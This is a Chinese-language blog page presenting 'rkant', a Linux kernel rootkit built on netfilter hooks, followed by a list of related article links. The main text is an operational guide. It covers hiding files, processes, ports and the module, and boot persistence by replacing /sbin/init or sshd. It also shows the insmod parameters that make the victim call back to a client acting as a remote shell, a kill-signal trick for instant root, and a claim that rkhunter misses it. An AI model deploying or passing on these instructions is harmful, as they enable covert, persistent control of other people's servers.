rkant = rootkit ant,它是利用netfilter hook开发的一款linux后门rootkit程序。

rkant包括服务器端程序(on victim server)和客户端程序(on user client pc),在ubuntu 14.04版本上面测试通过。
功能:
1、隐藏网络连接/端口,任意端口复用。不影响系统的正常工作和服务的正常运行。
2、隐藏文件以及目录,用linux工具无法查看到。防删除。
3、隐藏模块信息。ls /sys/module和lsmod都看不到任何模块信息。
4、开机自启动,感染sshd或init。
5、反向连接。服务器定时连接指定的ip/port。
6、反调试,防止被跟踪和破解。内容加密传送。
7、隐藏进程。
8、任何用户提权,获得root权限。

rkant通过rootkit hunter1.4.0检查,不被发现。

rkant.ko设计要点:
1、安装时,会隐藏式启动一个后门进程(antclient)。
2、在内核空间中尝试向指定的pc机(模块参数指定mac_addr/ip/port)发送探测消息,直到收到回应为止。
3、pc机(antkeeper)给server回送hello消息时,可传送需要执行的脚本比如sh /dev/rkant/myspy.sh,这样达到远程执行命令的目的。
4、在收到pc机给出的hello消息后,rootdoor回送hello_ack消息。在hello_ack消息中可送出任何想送出的信息,比如myspy.sh的执行结果或是其它信息。

安装说明:
1.将rkant.ko/antclient放到server的/etc/rkant目录下面。
2.将antkeeper放到客户机上面,任何一个目录均可。

在server中,如果用的是eth1,那么,安装参数是:
insmod rkant.ko dnet=eth1 dmac=00:0c:29:40:99:20 dip=192.168.2.8 //damc/dip是目标机(client pc)的mac和ip,它是虚拟机2

antkeeper运行方法:
./antkeeper 192.168.2.8 192.168.2.113 //第一个ip是本机的ip,第二个ip是server的ip。
如果拿不到server的ip,也就是说server只有内网IP,无公网IP。那第二个ip就不填,留空。

测试情况:
1、内核版本升级后再测试。Ubuntu14.0.4.1基础上升级内核为3.16.1
2、通信测试回联。
同时支持icmp和tcp port方式回联。
./antkeeper 192.168.1.10[测试机,执行antkeeper的机器] 192.168.1.111[服务器,安装rkant.ko的机器]
安装模块方法:insmod rkant.ko dnet=eth0 dmac=00:0c:29:18:94:fa dip=192.168.2.9 dbg=1 //dbg是新增的打开消息开关。
通过查看#dmesg可以看到打印消息,以方便定位问题。
记得要在另外一个计算机上执行:#./antkeeper 192.168.1.10 192.168.1.111
这样就可以收到回传消息,相当于一个远程shell。

3、开机自启动。
在server版本,可用init来替换原来的/sbin/init。在desktop版本,可以用sshd来替换/usr/sbin/sshd
新的init和sshd就会先调用/etc/rkant/bin/run.sh后再调用init和sshd。由此实现自启动。
记得先备份原来系统的init或sshd到/etc/rkant/bin目录下。/etc/rkant是安装目录,请先创建。

4、任何一个进程都可以隐藏。
方法:# kill -31 pid [你要隐藏的进程的pid]

5、隐藏某一个用户。
>>无法隐藏用户。只能是用linux缺省就有帐户比如sys或bin帐户来登录,然后进行提权。

当前用户取得root权限方法:# kill -64 65535

linux后门rootkit程序介绍相关推荐

  1. Linux下Rootkit介绍

    Linux下的RootKit简单介绍和分析 本文对Linux中的Rootkit进行简单介绍,主要用于防护方案对Rootkit的防御效果介绍. RootKit分为用户态rootkit和内核级rootki ...

  2. LINUX矩阵键盘简单介绍,stm32矩阵键盘原理图及程序介绍

    描述 STM32F0 系列产品基于超低功耗的 ARM Cortex-M0 处理器内核,整合增强的技术和功能,瞄准超低成本预算的应用.该系列微控制器缩短了采用 8 位和 16 位微控制器的设备与采用 3 ...

  3. 使用rkhunter检测Linux的rootkit

    转载来源 :使用rkhunter检测Linux的rootkit : https://www.jianshu.com/p/9a5fcd4b236b 介绍 rootkit是Linux平台下最常见的一种木马 ...

  4. 安全运维之:Linux后门入侵检测工具的使用

    推荐:10年技术力作:<高性能Linux服务器构建实战Ⅱ>全网发行,附试读章节和全书实例源码下载! 一.rootkit简介 rootkit是Linux平台下最常见的一种木马后门工具,它主要 ...

  5. linux后门入侵检测工具RKHUnter和ClamAV的使用

    一.关于rootkit rookit是linux平台下最常见的一种木马后门工具,他主要通过替换系统文件来达到攻击和隐藏的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种 ...

  6. Backdoor and Linux LKM Rootkit

    Backdoor and Linux LKM Rootkit(中文) http://www.3our.com 未知 2004-8-9   Backdoor and Linux LKM Rootkit( ...

  7. linux 系统命令被后门修改_红队实战攻防技术分享:Linux后门总结SSH利用篇

    导读:常见红队评估中,也能遇到很多Linux服务器,如何使Linux在安全人员/运维人员的检查过程中能够稳定的持续的用做跳板,本系列文章将对常见的Linux后门技术作以总结归纳,将相关技术展现给大家. ...

  8. linux怎么创建牡蛎_文件amp;目录小技巧 | Linux后门系列

    0x01 Linux 目录技巧 我们都知道 Windows 下文件和文件夹命名是有很多规则和限制的,但是可以通过一些程序来绕过限制,今天我们来看看 Linux 有哪些有趣的规则 参考 https:// ...

  9. Linux及文件系统基本介绍

    Linux及文件系统基本介绍 1   互联网行业现状 在服务器端市场: 超级计算机 2014年11月的数据显示前500系统中的485个系统都在运行着 Linux 的发布系统,而仅仅只有一台运行着 Wi ...

  10. linux 跟踪程序执行过程,用pvtrace和Graphviz实现对linux下C程序的函数调用跟踪

    用pvtrace和Graphviz实现对linux下C程序的函数调用跟踪 用pvtrace和Graphviz实现对linux下C程序的函数调用跟踪 1:功能介绍,使用本方法可以实现linux下C应用程 ...

最新文章

  1. hdu 2544(最短路径)
  2. arch Failed to load module intel
  3. 四川大学计算机网络_四川大学20考研情况
  4. 贵州师范学院数学与计算机科学,贵州师范学院数学与计算机科学学院
  5. [PY3]——字符串的分割、匹配、搜索方法总结
  6. python3获取当前日期_如何在python3中获取当前日期和时间? – Python3教程
  7. 成吉思汗:意志征服世界——读书笔记
  8. 打开相机用鼠标画框,画下一个时上一个消失
  9. .NET网络编程学习(三)--网络蜘蛛程序(Spider)
  10. 计算机视觉引论及数字成像系统
  11. USBoot /WinHex恢复故障U盘的数据文件
  12. LintCode炼码刷题实操平台
  13. 转 SPOOLING技术——操作系统
  14. [区块链安全-Ethernaut]附加GoodSamaritan解题思路
  15. Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis
  16. Java笔试面试-JVM
  17. imac打开terminal终端器
  18. 鸿蒙移植i.mx6ull (七) Liteos-a的编译系统
  19. Postman如何携带token——Bearer Token和Headers
  20. 基于密度的聚类算法(3)——DPC详解

热门文章

  1. 崩溃日志保存本地log,服务器上传
  2. 关于手机-Android版本-基带版本,连续点击六次进入工厂模式。自定义版本点五次动态隐藏显示某应用。
  3. 完整版JavaWeb环境搭建-maven-servlet...与测试,欢迎大家一起学习
  4. 已经买好了域名后怎么建立一个网站
  5. 推荐一款非常好用的鼠标手势软件StrokeIt
  6. mysql设置字符集gb2312_mysq查询语句包含中文以及中文乱码,字符集 GBK、GB2312、UTF8的区别...
  7. oracle gbk 无法识别,oracle 字符集总结(超出GBK范围的字符存取问题未解决)
  8. 带色彩恢复的多尺度视网膜增强算法(MSRCR)的原理、实现及应用
  9. xinput1_3.dll丢失怎么修复win10_有什么好的修复方法推荐?
  10. mysql优化join_MySQL-巧用Join来优化SQL